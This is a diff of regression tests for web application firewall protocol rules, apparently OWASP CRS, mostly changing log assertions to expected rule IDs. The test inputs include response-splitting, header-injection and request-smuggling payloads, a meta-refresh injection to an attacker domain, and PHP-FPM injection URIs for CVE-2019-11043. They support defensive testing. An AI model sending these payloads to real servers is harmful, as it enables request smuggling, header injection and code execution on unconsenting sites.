a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml index d048775fe..3142e77cf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml @@ -19,7 +19,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 2 desc: "block request with an invalid cache-control directive in request" stages: @@ -35,7 +36,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 3 desc: "block request with an invalid cache-control directive in request with multiple directives" stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 4 desc: "block request with an invalid cache-control syntax in request with multiple directives" stages: @@ -67,7 +70,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920510\"" + log: + expect_ids: [920510] - test_id: 5 desc: "allow request with valid cache-control single directive" stages: @@ -83,7 +87,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920510\"" + log: + no_expect_ids: [920510] - test_id: 6 desc: "allow request with valid cache-control multiple directive" stages: @@ -99,4 +104,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920510\"" + log: + no_expect_ids: [920510] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml index dc3463fab..71ae7ff93 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml @@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 2 desc: "Allowed Accept-Encoding: gzip,deflate,identity" stages: @@ -35,7 +36,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 3 desc: "Allowed Accept-Encoding: compress;q=0.5, gzip;q=1.0" stages: @@ -51,7 +53,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 4 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -67,7 +70,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 5 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -83,7 +87,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 6 desc: "Allowed empty Accept-Encoding" stages: @@ -99,7 +104,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 7 desc: "Not allowed Accept-Encoding CVE-2022-21907" stages: @@ -115,7 +121,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920520\"" + log: + expect_ids: [920520] - test_id: 8 desc: "False positive test for long Accept-Encoding headers from internet.nl" stages: @@ -131,7 +138,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] - test_id: 9 desc: "False positive test for long Accept-Encoding of length 99" stages: @@ -147,4 +155,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920520\"" + log: + no_expect_ids: [920520] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml index d437f1090..820a71b7f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml @@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 2 desc: "Allowed Accept-Encoding: gzip,deflate,identity" stages: @@ -35,7 +36,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 3 desc: "Allowed Accept-Encoding: compress;q=0.5, gzip;q=1.0" stages: @@ -51,7 +53,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 4 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -67,7 +70,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 5 desc: "Allowed Accept-Encoding: gzip;q=1.0, identity; q=0.5, *;q=0" stages: @@ -83,7 +87,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 6 desc: "Allowed empty Accept-Encoding" stages: @@ -99,7 +104,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920521\"" + log: + no_expect_ids: [920521] - test_id: 7 desc: "Not allowed Accept-Encoding: foobar" stages: @@ -115,4 +121,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920521\"" + log: + expect_ids: [920521] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml index 1f9720d52..ae8da2bdf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml @@ -20,7 +20,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920530\"" + log: + no_expect_ids: [920530] - test_id: 2 desc: "Bypass attempt with two charsets" stages: @@ -37,7 +38,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920530\"" + log: + expect_ids: [920530] - test_id: 3 desc: "Bypass attempt with hiding the charset inside a field" stages: @@ -54,7 +56,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920530\"" + log: + expect_ids: [920530] - test_id: 4 desc: "Bypass attempt with uppercase CHARSET" stages: @@ -71,4 +74,5 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920530\"" + log: + expect_ids: [920530] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml index c8a02d6f0..2e2f57606 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml @@ -20,7 +20,8 @@ tests: data: "testarg=%5Cu0061lert" version: "HTTP/1.1" output: - log_contains: "id \"920540\"" + log: + expect_ids: [920540] - test_id: 2 desc: "Unicode character bypass issue #2512: eval() eval()" stages: @@ -37,7 +38,8 @@ tests: data: "testarg=%5Cu0065val%28%29" version: "HTTP/1.1" output: - log_contains: "id \"920540\"" + log: + expect_ids: [920540] - test_id: 3 desc: "Unicode character bypass: negative test for JSON (double encoded as JSON parser decodes it)" stages: @@ -54,4 +56,5 @@ tests: data: "{\"testarg\": \"\x5c\x5cu0065val\"}" version: "HTTP/1.1" output: - no_log_contains: "id \"920540\"" + log: + no_expect_ids: [920540] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml index 2fd76434c..b3ecb693e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml @@ -16,7 +16,8 @@ tests: Accept: text/html;q=0.9;charset=CP1026,*/*;q=0.8 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 2 stages: - input: @@ -29,7 +30,8 @@ tests: Accept: text/html;q=0.9;charset="CP1026",*/*;q=0.8 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 3 stages: - input: @@ -42,7 +44,8 @@ tests: Accept: text/html; charset=CP1026 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 4 stages: - input: @@ -55,7 +58,8 @@ tests: Accept: text/html;q=0.9;charset=UTF-8,*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 5 stages: - input: @@ -68,7 +72,8 @@ tests: Accept: text/html;q=0.9;charset="UTF-8",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 6 stages: - input: @@ -81,7 +86,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 7 stages: - input: @@ -94,7 +100,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8;charset=utf-16 version: "HTTP/1.1" output: - log_contains: id "920600" + log: + expect_ids: [920600] - test_id: 8 stages: - input: @@ -107,7 +114,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-1",*/*;q=0.8;charset=utf-8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 9 stages: - input: @@ -120,7 +128,8 @@ tests: Accept: text/html;q=0.9;charset="iso-8859-15",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 10 stages: - input: @@ -133,7 +142,8 @@ tests: Accept: text/html;q=0.9;charset="windows-1252",*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 11 stages: - input: @@ -146,7 +156,8 @@ tests: Accept: text/html;q=0.9;charset="windows-1252",*/*;q=0.8; version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 12 stages: - input: @@ -159,7 +170,8 @@ tests: Accept: text/html;q=0.9;charset="windows-1252";,*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 13 desc: Allow "*" only media type stages: @@ -173,7 +185,8 @@ tests: Accept: text/html;q=0.9;charset="utf-8";,*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 14 desc: Allow "q=.1" instead of "q=0.1" stages: @@ -187,7 +200,8 @@ tests: Accept: text/html;q=0.9;charset="utf-8";,*/*;q=.8 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] - test_id: 15 desc: False positive test request that violates the spec but should be tolerated stages: @@ -201,4 +215,5 @@ tests: Accept: text/html;q=0.9;charset=utf-8, *;q=0.1 version: "HTTP/1.1" output: - no_log_contains: id "920600" + log: + no_expect_ids: [920600] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml index 3f1f4c617..d89882d6d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml @@ -17,19 +17,18 @@ tests: Accept: text/html;q=0.9,*/*;q=0.8 version: "HTTP/1.1" output: - no_log_contains: "id \"920610\"" -# Commented test because Apache errors before processing the rules, meaning it will always fail in our CI environment. -# - test_id: 2 -# desc: Raw URL fragment test -# stages: -# - input: -# dest_addr: "127.0.0.1" -# port: 80 -# uri: "/#fragment" -# headers: -# User-Agent: "OWASP CRS test agent" -# Host: "localhost" -# Accept: text/html;q=0.9,*/*;q=0.8 -# version: "HTTP/1.1" -# output: -# log_contains: "id \"920610\"" + log: + no_expect_ids: [920610] + - test_id: 2 + desc: Raw URL fragment test + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/#fragment" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/html;q=0.9,*/*;q=0.8 + output: + status: 400 diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml index 2187c0d9c..f3cb87bce 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml @@ -5,11 +5,17 @@ meta: rule_id: 920620 tests: - test_id: 1 - desc: Multiple Content-Type request headers + desc: | + Multiple Content-Type request headers. + On httpd, the two headers will be concatenated into a single header. + Thus, this rule will not trigger on httpd. stages: - input: dest_addr: "127.0.0.1" port: 80 encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg==" output: - log_contains: "id \"920620\"" + # match reflected request in JSON response from httpbin + response_contains: |- + Content-Type\W*: \[\W*application/json, application/xml + no_expect_ids: [920620] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml index 69ebf3ccc..26ee82fe0 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml @@ -19,7 +19,8 @@ tests: data: "var=%0aPOST / HTTP/1.0" version: HTTP/1.0 output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 2 desc: "HTTP Response Splitting" stages: @@ -36,7 +37,8 @@ tests: data: "var=aaa%0aGET+/+HTTP/1.1" version: HTTP/1.0 output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 3 desc: "HTTP Response Splitting" stages: @@ -53,7 +55,8 @@ tests: data: "var=aaa%0dHEAD+http://example.com/+HTTP/1.1" version: HTTP/1.0 output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 4 desc: "HTTP Response Splitting - pre-HTTP/1.0" stages: @@ -70,7 +73,8 @@ tests: data: "var=aaa%0d%0aGet+/foo%0d" version: HTTP/1.0 output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 5 desc: "HTTP Response Splitting" stages: @@ -87,7 +91,8 @@ tests: data: "var=aaa%0d%0aGet+foo+bar" version: HTTP/1.0 output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 6 desc: HTTP Request Smuggling bypass with Content-Type text/plain stages: @@ -105,7 +110,8 @@ tests: data: "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n" version: "HTTP/1.1" output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 7 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: @@ -120,7 +126,8 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" version: "HTTP/1.1" output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 8 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: @@ -135,7 +142,8 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" version: "HTTP/1.1" output: - log_contains: id "921110" + log: + expect_ids: [921110] - test_id: 9 desc: "HTTP Response Splitting false negative test" stages: @@ -151,7 +159,8 @@ tests: data: "var=soundtrack Gympl\r\nanything" version: "HTTP/1.1" output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 10 desc: "HTTP Response Splitting false positive test issue 2054" stages: @@ -167,7 +176,8 @@ tests: data: "var=budget foo)</bar>\n" version: "HTTP/1.1" output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] - test_id: 11 desc: "HTTP Response Splitting false positive test issue 2054" stages: @@ -183,4 +193,5 @@ tests: data: "var=get it\n" version: "HTTP/1.1" output: - no_log_contains: id "921110" + log: + no_expect_ids: [921110] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml index 31bf2953d..c7cf96622 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml @@ -22,7 +22,8 @@ tests: uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> version: HTTP/1.1 output: - log_contains: id "921120" + log: + expect_ids: [921120] - test_id: 2 desc: "HTTP Response splitting attack" stages: @@ -39,7 +40,8 @@ tests: uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423<html>ftw</html>" version: HTTP/1.1 output: - log_contains: id "921120" + log: + expect_ids: [921120] - test_id: 3 desc: "Fix FP issue 1615. Header followed by word chars." stages: @@ -56,7 +58,8 @@ tests: uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" version: HTTP/1.1 output: - no_log_contains: id "921120" + log: + no_expect_ids: [921120] - test_id: 4 desc: "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression" stages: @@ -74,4 +77,5 @@ tests: data: "var=%0d%0aContent-Length: 0" version: HTTP/1.1 output: - log_contains: id "921120" + log: + expect_ids: [921120] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 3c54a10dc..24d5448c7 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -22,7 +22,8 @@ tests: uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] - test_id: 2 desc: "HTTP Response splitting attack: cookie data" stages: @@ -38,7 +39,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] - test_id: 3 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: @@ -53,7 +55,8 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] - test_id: 4 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: @@ -68,4 +71,5 @@ tests: uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" version: "HTTP/1.1" output: - log_contains: id "921130" + log: + expect_ids: [921130] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml index a6b5cade5..224232ba5 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml @@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id:921140" + log: + no_expect_ids: [921140] - test_id: 2 desc: "HTTP Header Injection Attack via headers" stages: @@ -35,4 +36,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id:921140" + log: + no_expect_ids: [921140] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml index c56c5082a..9a57c4427 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml @@ -18,7 +18,8 @@ tests: uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" version: "HTTP/1.1" output: - log_contains: "id \"921150\"" + log: + expect_ids: [921150] - test_id: 2 desc: "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)" stages: @@ -33,4 +34,5 @@ tests: uri: "/get?parameter%0d%0a=test" version: HTTP/1.0 output: - log_contains: id "921150" + log: + expect_ids: [921150] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml index 8609259e6..5a9a5f0e6 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?941151-1=test%0Dnext=more" version: "HTTP/1.1" output: - log_contains: "id \"921151\"" + log: + expect_ids: [921151] - test_id: 2 stages: - input: @@ -31,7 +32,8 @@ tests: uri: "/get?941151-2=test%0Anext=more" version: "HTTP/1.1" output: - log_contains: "id \"921151\"" + log: + expect_ids: [921151] - test_id: 3 stages: - input: @@ -45,7 +47,8 @@ tests: uri: "/get?941151-3=test%0A%0Dnext=more" version: "HTTP/1.1" output: - log_contains: "id \"921151\"" + log: + expect_ids: [921151] - test_id: 4 stages: - input: @@ -60,4 +63,5 @@ tests: data: '941151-4=test\r\nmore=text' version: "HTTP/1.1" output: - no_log_contains: "id \"921151\"" + log: + no_expect_ids: [921151] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml index 269e7a352..49354a855 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml @@ -18,7 +18,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 2 desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key" stages: @@ -33,7 +34,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 3 desc: "HTTP Header Injection Attack via payload: w/header" stages: @@ -48,7 +50,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 4 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key" stages: @@ -63,7 +66,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 5 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value" stages: @@ -78,7 +82,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 6 desc: "Status Page Test - simple HTTP header Injection Attack via payload in value" stages: @@ -93,4 +98,5 @@ tests: uri: "/get?foo=%0d%0arefresh:%20www.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index 6af9701df..7b322393a 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml @@ -18,7 +18,8 @@ tests: uri: "/?pineapple=pizza" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # Standard GET request test_id: 2 stages: @@ -33,7 +34,8 @@ tests: uri: "/?pineapple=pizza&pizza=pineapple" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # Standard GET request (Negative, no args) test_id: 3 stages: @@ -48,7 +50,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # HPP payload test_id: 4 stages: @@ -63,7 +66,8 @@ tests: uri: "/?pineapple=pizza&pineapple=aint-pizza" version: "HTTP/1.1" output: - log_contains: "id \"921180\"" + log: + expect_ids: [921180] - # Similar arg names test_id: 5 stages: @@ -78,7 +82,8 @@ tests: uri: "/?pineapple=pizza&pineapple2=aint-pizza" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # HPP payload with multiple iterations test_id: 6 stages: @@ -93,4 +98,5 @@ tests: uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" version: "HTTP/1.1" output: - log_contains: "id \"921180\"" + log: + expect_ids: [921180] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml index 3176f6c5c..f8138f8a2 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml @@ -17,7 +17,8 @@ tests: uri: "/foo%0Abar" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] - test_id: 2 desc: "New line char in request filename (2)" stages: @@ -31,7 +32,8 @@ tests: uri: "/foo%0abar" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] - test_id: 3 desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: @@ -45,7 +47,8 @@ tests: uri: "/index.php/PHP%0Ainfo.php?QQQ" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] - test_id: 4 desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: @@ -59,4 +62,5 @@ tests: uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 70e89f148..dc397acbf 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml @@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "921200" + log: + no_expect_ids: [921200] - test_id: 2 desc: "Testing for FP, this should not trigger" stages: @@ -35,7 +36,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "921200" + log: + no_expect_ids: [921200] - test_id: 3 desc: "Testing for FP, this should not trigger" stages: @@ -51,7 +53,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "921200" + log: + no_expect_ids: [921200] - test_id: 4 desc: "Testing for rule, this should trigger" stages: @@ -67,7 +70,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 5 desc: "Testing for rule, this should trigger" stages: @@ -83,7 +87,8 @@ tests: port: 80 version: "HTTP/1.1" output: - 